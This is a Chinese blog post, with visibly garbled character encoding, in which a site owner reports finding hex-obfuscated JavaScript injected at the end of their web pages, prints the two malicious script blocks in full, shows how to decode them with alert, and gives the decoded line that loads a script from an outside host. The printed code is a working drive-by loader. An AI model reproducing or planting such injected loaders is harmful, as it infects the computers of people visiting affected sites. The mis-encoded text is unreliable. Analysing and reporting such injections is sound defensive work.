今天打開一個自己的網(wǎng)頁,竟發(fā)現(xiàn)了文件尾巴病毒源,真是可惡,空間商沒做好殺毒防毒啊。
病毒源如下:
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
這是一段通過16進(jìn)制編碼的script病毒,當(dāng)你打開含有這段代碼的頁面時,那你的電腦立馬中毒,好狠啊!
可以通過alert來解密,例如把上面粗體字代碼解密:
<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>
解密結(jié)果是:
同樣的,把后面各個中括號里的代碼段alert,結(jié)果這個病毒源代碼就出來了。上面的病毒源代碼解密結(jié)果是:
document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");
很明顯,這是在你電腦執(zhí)行一段javascript掛馬程序,一旦你打開含有這段代碼的頁面,你的電腦就立即中招了。
這些病毒我暫時沒找到專殺軟件,例如你有上千個頁面都中毒了,那是不能手動一個一個清除的了。一旦我找到專殺軟件,會第一時間來博客共享。有網(wǎng)友發(fā)現(xiàn)專殺軟件了嗎?